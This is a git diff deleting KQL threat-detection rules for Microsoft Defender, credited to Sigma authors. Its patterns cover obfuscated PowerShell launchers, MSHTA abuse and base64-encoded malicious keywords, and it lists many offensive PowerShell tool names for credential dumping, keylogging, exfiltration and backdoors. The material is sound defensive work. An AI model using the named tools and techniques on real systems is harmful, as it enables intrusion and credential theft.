-| where (ProcessCommandLine contains "system.io.compression.deflatestream" or ProcessCommandLine contains "system.io.streamreader" or ProcessCommandLine contains "readtoend(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "text.encoding]::ascii")
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql b/Execution/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql
deleted file mode 100644
index c693d26a..00000000
--- a/Execution/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
-// Date: 2019/11/08
-// Level: high
-// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[" or ProcessCommandLine matches regex "\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[" or ProcessCommandLine matches regex "\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[" or ProcessCommandLine matches regex "\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}" or ProcessCommandLine matches regex "\\*mdr\\*\\W\\s*\\)\\.Name" or ProcessCommandLine matches regex "\\$VerbosePreference\\.ToString\\(" or ProcessCommandLine matches regex "\\[String\\]\\s*\\$VerbosePreference"
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_STDIN+_Launcher.kql b/Execution/Invoke-Obfuscation_STDIN+_Launcher.kql
deleted file mode 100644
index 4108ea3f..00000000
--- a/Execution/Invoke-Obfuscation_STDIN+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/15
-// Level: high
-// Description: Detects Obfuscated use of stdin to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\""
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql b/Execution/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql
deleted file mode 100644
index e1957d0c..00000000
--- a/Execution/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2020/10/13
-// Level: high
-// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "{0}" or ProcessCommandLine contains "{1}" or ProcessCommandLine contains "{2}" or ProcessCommandLine contains "{3}" or ProcessCommandLine contains "{4}" or ProcessCommandLine contains "{5}") and (ProcessCommandLine contains "&&set" and ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_VAR+_Launcher.kql b/Execution/Invoke-Obfuscation_VAR+_Launcher.kql
deleted file mode 100644
index c5c03061..00000000
--- a/Execution/Invoke-Obfuscation_VAR+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/15
-// Level: high
-// Description: Detects Obfuscated use of Environment Variables to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r)(?:\\s|)\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\""
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_Via_Stdin.kql b/Execution/Invoke-Obfuscation_Via_Stdin.kql
deleted file mode 100644
index c7d99e0d..00000000
--- a/Execution/Invoke-Obfuscation_Via_Stdin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/12
-// Level: high
-// Description: Detects Obfuscated Powershell via Stdin in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*""
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_Via_Use_Clip.kql b/Execution/Invoke-Obfuscation_Via_Use_Clip.kql
deleted file mode 100644
index b66ecade..00000000
--- a/Execution/Invoke-Obfuscation_Via_Use_Clip.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/09
-// Level: high
-// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)"
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_Via_Use_MSHTA.kql b/Execution/Invoke-Obfuscation_Via_Use_MSHTA.kql
deleted file mode 100644
index 7041f5ee..00000000
--- a/Execution/Invoke-Obfuscation_Via_Use_MSHTA.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/08
-// Level: high
-// Description: Detects Obfuscated Powershell via use MSHTA in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "set" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "mshta" and ProcessCommandLine contains "vbscript:createobject" and ProcessCommandLine contains ".run" and ProcessCommandLine contains "(window.close)"
\ No newline at end of file
diff --git a/Execution/Java_Running_with_Remote_Debugging.kql b/Execution/Java_Running_with_Remote_Debugging.kql
deleted file mode 100644
index f9e528bc..00000000
--- a/Execution/Java_Running_with_Remote_Debugging.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect
-// Tags: attack.t1203, attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains "transport=dt_socket,address=" and (ProcessCommandLine contains "jre1." or ProcessCommandLine contains "jdk1.")) and (not((ProcessCommandLine contains "address=127.0.0.1" or ProcessCommandLine contains "address=localhost")))
\ No newline at end of file
diff --git a/Execution/Local_File_Read_Using_Curl.EXE.kql b/Execution/Local_File_Read_Using_Curl.EXE.kql
deleted file mode 100644
index f838af05..00000000
--- a/Execution/Local_File_Read_Using_Curl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/27
-// Level: medium
-// Description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "file:///" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/Execution/Logged-On_User_Password_Change_Via_Ksetup.EXE.kql b/Execution/Logged-On_User_Password_Change_Via_Ksetup.EXE.kql
deleted file mode 100644
index 5749cb76..00000000
--- a/Execution/Logged-On_User_Password_Change_Via_Ksetup.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/06
-// Level: medium
-// Description: Detects password change for the logged-on user's via "ksetup.exe"
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains " /ChangePassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe")
\ No newline at end of file
diff --git a/Execution/MMC20_Lateral_Movement.kql b/Execution/MMC20_Lateral_Movement.kql
deleted file mode 100644
index 4c7b0b92..00000000
--- a/Execution/MMC20_Lateral_Movement.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)
-// Date: 2020/03/04
-// Level: high
-// Description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
-// Tags: attack.execution, attack.t1021.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "-Embedding" and FolderPath endswith "\\mmc.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/Execution/MSHTA_Suspicious_Execution_01.kql b/Execution/MSHTA_Suspicious_Execution_01.kql
deleted file mode 100644
index 280ba986..00000000
--- a/Execution/MSHTA_Suspicious_Execution_01.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)
-// Date: 2019/02/22
-// Level: high
-// Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
-// Tags: attack.defense_evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020.1599
-DeviceProcessEvents
-| where (ProcessCommandLine contains "vbscript" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".lnk" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".zip" or ProcessCommandLine contains ".dll") and FolderPath endswith "\\mshta.exe"
\ No newline at end of file
diff --git a/Execution/Malicious_Base64_Encoded_PowerShell_Keywords_in_Command_Lines.kql b/Execution/Malicious_Base64_Encoded_PowerShell_Keywords_in_Command_Lines.kql
deleted file mode 100644
index 9385195f..00000000
--- a/Execution/Malicious_Base64_Encoded_PowerShell_Keywords_in_Command_Lines.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: John Lambert (rule)
-// Date: 2019/01/16
-// Level: high
-// Description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA" or ProcessCommandLine contains "aXRzYWRtaW4gL3RyYW5zZmVy" or ProcessCommandLine contains "IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA" or ProcessCommandLine contains "JpdHNhZG1pbiAvdHJhbnNmZX" or ProcessCommandLine contains "YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg" or ProcessCommandLine contains "Yml0c2FkbWluIC90cmFuc2Zlc" or ProcessCommandLine contains "AGMAaAB1AG4AawBfAHMAaQB6AGUA" or ProcessCommandLine contains "JABjAGgAdQBuAGsAXwBzAGkAegBlA" or ProcessCommandLine contains "JGNodW5rX3Npem" or ProcessCommandLine contains "QAYwBoAHUAbgBrAF8AcwBpAHoAZQ" or ProcessCommandLine contains "RjaHVua19zaXpl" or ProcessCommandLine contains "Y2h1bmtfc2l6Z" or ProcessCommandLine contains "AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A" or ProcessCommandLine contains "kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg" or ProcessCommandLine contains "lPLkNvbXByZXNzaW9u" or ProcessCommandLine contains "SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA" or ProcessCommandLine contains "SU8uQ29tcHJlc3Npb2" or ProcessCommandLine contains "Ty5Db21wcmVzc2lvb" or ProcessCommandLine contains "AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ" or ProcessCommandLine contains "kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA" or ProcessCommandLine contains "lPLk1lbW9yeVN0cmVhb" or ProcessCommandLine contains "SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A" or ProcessCommandLine contains "SU8uTWVtb3J5U3RyZWFt" or ProcessCommandLine contains "Ty5NZW1vcnlTdHJlYW" or ProcessCommandLine contains "4ARwBlAHQAQwBoAHUAbgBrA" or ProcessCommandLine contains "5HZXRDaHVua" or ProcessCommandLine contains "AEcAZQB0AEMAaAB1AG4Aaw" or ProcessCommandLine contains "LgBHAGUAdABDAGgAdQBuAGsA" or ProcessCommandLine
contains "LkdldENodW5r" or ProcessCommandLine contains "R2V0Q2h1bm" or ProcessCommandLine contains "AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A" or ProcessCommandLine contains "QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA" or ProcessCommandLine contains "RIUkVBRF9JTkZPNj" or ProcessCommandLine contains "SFJFQURfSU5GTzY0" or ProcessCommandLine contains "VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA" or ProcessCommandLine contains "VEhSRUFEX0lORk82N" or ProcessCommandLine contains "AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA" or ProcessCommandLine contains "cmVhdGVSZW1vdGVUaHJlYW" or ProcessCommandLine contains "MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA" or ProcessCommandLine contains "NyZWF0ZVJlbW90ZVRocmVhZ" or ProcessCommandLine contains "Q3JlYXRlUmVtb3RlVGhyZWFk" or ProcessCommandLine contains "QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA" or ProcessCommandLine contains "0AZQBtAG0AbwB2AGUA" or ProcessCommandLine contains "1lbW1vdm" or ProcessCommandLine contains "AGUAbQBtAG8AdgBlA" or ProcessCommandLine contains "bQBlAG0AbQBvAHYAZQ" or ProcessCommandLine contains "bWVtbW92Z" or ProcessCommandLine contains "ZW1tb3Zl") and ProcessCommandLine contains " hidden " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql b/Execution/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql
deleted file mode 100644
index dd255075..00000000
--- a/Execution/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/02 -// Level: high -// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks -// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" 
or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or 
ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or 
ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or 
ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or 
ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "VolumeShadowCopyTools"
\ No newline at end of file
diff --git a/Execution/Malicious_PowerShell_Scripts_-_FileCreation.kql b/Execution/Malicious_PowerShell_Scripts_-_FileCreation.kql
deleted file mode 100644
index 248f9cd5..00000000
--- a/Execution/Malicious_PowerShell_Scripts_-_FileCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein -// Date: 2018/04/07 -// Level: high -// Description: Detects the creation of known offensive powershell scripts used for exploitation -// Tags: attack.execution, attack.t1059.001 -DeviceFileEvents -| where (FolderPath endswith "\\Add-ConstrainedDelegationBackdoor.ps1" or FolderPath endswith "\\Add-Exfiltration.ps1" or FolderPath endswith "\\Add-Persistence.ps1" or FolderPath endswith "\\Add-RegBackdoor.ps1" or FolderPath endswith "\\Add-RemoteRegBackdoor.ps1" or FolderPath endswith "\\Add-ScrnSaveBackdoor.ps1" or FolderPath endswith "\\ADRecon.ps1" or FolderPath endswith "\\AzureADRecon.ps1" or FolderPath endswith "\\Check-VM.ps1" or FolderPath endswith "\\ConvertTo-ROT13.ps1" or FolderPath endswith "\\Copy-VSS.ps1" or FolderPath endswith "\\Create-MultipleSessions.ps1" or FolderPath endswith "\\DNS_TXT_Pwnage.ps1" or FolderPath endswith "\\dnscat2.ps1" or FolderPath endswith "\\Do-Exfiltration.ps1" or FolderPath endswith "\\DomainPasswordSpray.ps1" or FolderPath endswith "\\Download_Execute.ps1" or FolderPath endswith "\\Download-Execute-PS.ps1" or FolderPath endswith "\\Enable-DuplicateToken.ps1" or FolderPath endswith "\\Enabled-DuplicateToken.ps1" or FolderPath endswith "\\Execute-Command-MSSQL.ps1" or FolderPath endswith "\\Execute-DNSTXT-Code.ps1" or FolderPath endswith "\\Execute-OnTime.ps1" or FolderPath endswith "\\ExetoText.ps1" or FolderPath endswith "\\Exploit-Jboss.ps1" or FolderPath endswith "\\Find-AVSignature.ps1" or FolderPath endswith "\\Find-Fruit.ps1" or FolderPath endswith "\\Find-GPOLocation.ps1" or FolderPath endswith "\\Find-TrustedDocuments.ps1" or FolderPath endswith "\\FireBuster.ps1" or FolderPath endswith "\\FireListener.ps1" or FolderPath endswith "\\Get-ApplicationHost.ps1" or FolderPath endswith "\\Get-ChromeDump.ps1" or FolderPath endswith "\\Get-ClipboardContents.ps1" or FolderPath endswith 
"\\Get-ComputerDetail.ps1" or FolderPath endswith "\\Get-FoxDump.ps1" or FolderPath endswith "\\Get-GPPAutologon.ps1" or FolderPath endswith "\\Get-GPPPassword.ps1" or FolderPath endswith "\\Get-IndexedItem.ps1" or FolderPath endswith "\\Get-Keystrokes.ps1" or FolderPath endswith "\\Get-LSASecret.ps1" or FolderPath endswith "\\Get-MicrophoneAudio.ps1" or FolderPath endswith "\\Get-PassHashes.ps1" or FolderPath endswith "\\Get-PassHints.ps1" or FolderPath endswith "\\Get-RegAlwaysInstallElevated.ps1" or FolderPath endswith "\\Get-RegAutoLogon.ps1" or FolderPath endswith "\\Get-RickAstley.ps1" or FolderPath endswith "\\Get-Screenshot.ps1" or FolderPath endswith "\\Get-SecurityPackages.ps1" or FolderPath endswith "\\Get-ServiceFilePermission.ps1" or FolderPath endswith "\\Get-ServicePermission.ps1" or FolderPath endswith "\\Get-ServiceUnquoted.ps1" or FolderPath endswith "\\Get-SiteListPassword.ps1" or FolderPath endswith "\\Get-System.ps1" or FolderPath endswith "\\Get-TimedScreenshot.ps1" or FolderPath endswith "\\Get-UnattendedInstallFile.ps1" or FolderPath endswith "\\Get-Unconstrained.ps1" or FolderPath endswith "\\Get-USBKeystrokes.ps1" or FolderPath endswith "\\Get-VaultCredential.ps1" or FolderPath endswith "\\Get-VulnAutoRun.ps1" or FolderPath endswith "\\Get-VulnSchTask.ps1" or FolderPath endswith "\\Get-WebConfig.ps1" or FolderPath endswith "\\Get-WebCredentials.ps1" or FolderPath endswith "\\Get-WLAN-Keys.ps1" or FolderPath endswith "\\Gupt-Backdoor.ps1" or FolderPath endswith "\\HTTP-Backdoor.ps1" or FolderPath endswith "\\HTTP-Login.ps1" or FolderPath endswith "\\Install-ServiceBinary.ps1" or FolderPath endswith "\\Install-SSP.ps1" or FolderPath endswith "\\Invoke-ACLScanner.ps1" or FolderPath endswith "\\Invoke-ADSBackdoor.ps1" or FolderPath endswith "\\Invoke-AmsiBypass.ps1" or FolderPath endswith "\\Invoke-ARPScan.ps1" or FolderPath endswith "\\Invoke-BackdoorLNK.ps1" or FolderPath endswith "\\Invoke-BadPotato.ps1" or FolderPath endswith 
